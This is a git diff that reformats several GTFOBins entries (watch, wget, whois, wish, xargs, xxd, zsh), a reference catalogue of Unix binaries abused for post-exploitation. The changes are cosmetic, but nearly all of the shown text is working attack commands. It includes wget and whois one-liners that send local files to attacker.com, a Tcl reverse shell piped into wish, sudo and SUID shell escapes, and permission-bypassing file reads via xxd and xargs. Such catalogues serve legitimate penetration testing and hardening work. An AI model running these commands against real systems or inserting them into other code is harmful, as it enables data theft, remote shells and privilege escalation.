--- a/_gtfobins/watch.md
+++ b/_gtfobins/watch.md
@@ -1,12 +1,12 @@
 ---
 functions:
 execute-non-interactive:
- - code: watch /usr/bin/id
- sudo-enabled:
- - code: sudo watch /usr/bin/id
+ - code: watch /usr/bin/id
 suid-enabled:
- - description: This keeps the SUID privileges only if the `-x` option is present.
- code: ./watch -x /usr/bin/id
+ - description: This keeps the SUID privileges only if the `-x` option is present.
+ code: "./watch -x /usr/bin/id"
+ sudo-enabled:
+ - code: sudo watch /usr/bin/id
 suid-limited:
- - code: ./watch /usr/bin/id
+ - code: "./watch /usr/bin/id"
 ---
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 1c141e6..16ccf00 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -1,15 +1,16 @@
 ---
 functions:
 upload:
- - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
+ - description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
+ Run an HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
 download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- wget $URL -O $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ wget $URL -O $LFILE
 ---
diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md
index f0e0d21..71bffd9 100644
--- a/_gtfobins/whois.md
+++ b/_gtfobins/whois.md
@@ -1,31 +1,37 @@
 ---
-description: |
- `whois` hangs waiting for the remote peer to close the socket.
+description: "`whois` hangs waiting for the remote peer to close the socket.\n"
 functions:
 upload:
- - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`cat $LFILE`"
- - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`base64 $LFILE`"
+ - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
+ and its length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`cat $LFILE`"
+ - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
+ | base64 -d > "file_to_save"` on the attacker box to collect the file. The file
+ length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`base64 $LFILE`"
 download:
- - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT > "$LFILE"
- - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
+ - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
+ < "file_to_send"` on the attacker box to send the file. The file has instances
+ of `$'\x0d'` stripped.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT > "$LFILE"
+ - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
+ | nc -l -p 12345` on the attacker box to send the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
 ---
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index a65439e..e495e28 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -1,17 +1,17 @@
 ---
 functions:
 execute-interactive:
- - code: |
- wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
+ - code: |
+ wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
 reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ sudo-enabled:
+ - code: |
+ sudo wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
 ---
diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md
index 5945187..a38ac2e 100644
--- a/_gtfobins/xargs.md
+++ b/_gtfobins/xargs.md
@@ -1,14 +1,16 @@
 ---
 functions:
 execute-non-interactive:
- - code: xargs -a /dev/null /usr/bin/id
- sudo-enabled:
- - code: sudo xargs -a /dev/null /usr/bin/id
- suid-enabled:
- - code: ./xargs -a /dev/null /usr/bin/id
+ - code: xargs -a /dev/null /usr/bin/id
 file-read:
- - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
- code: |
- LFILE=file_to_read
- xargs -a "$LFILE" -0
+ - description: This works as long as the file does not contain the NUL character,
+ also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
+ GNU version only.
+ code: |
+ LFILE=file_to_read
+ xargs -a "$LFILE" -0
+ suid-enabled:
+ - code: "./xargs -a /dev/null /usr/bin/id"
+ sudo-enabled:
+ - code: sudo xargs -a /dev/null /usr/bin/id
 ---
diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md
index c64b879..7d854bb 100644
--- a/_gtfobins/xxd.md
+++ b/_gtfobins/xxd.md
@@ -1,19 +1,19 @@
 ---
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo xxd "$LFILE" | xxd -r
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./xxd "$LFILE" | xxd -r
- file-read:
- - code: |
- LFILE=file_to_read
- xxd "$LFILE" | xxd -r
 file-write:
- - code: |
- LFILE=file_to_write
- echo data | xxd | xxd -r - "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | xxd | xxd -r - "$LFILE"
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ xxd "$LFILE" | xxd -r
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./xxd "$LFILE" | xxd -r
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo xxd "$LFILE" | xxd -r
 ---
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index 1db7501..4e73feb 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: zsh
- sudo-enabled:
- - code: sudo zsh
+ - code: zsh
 suid-enabled:
- - code: ./zsh
+ - code: "./zsh"
+ sudo-enabled:
+ - code: sudo zsh
 ---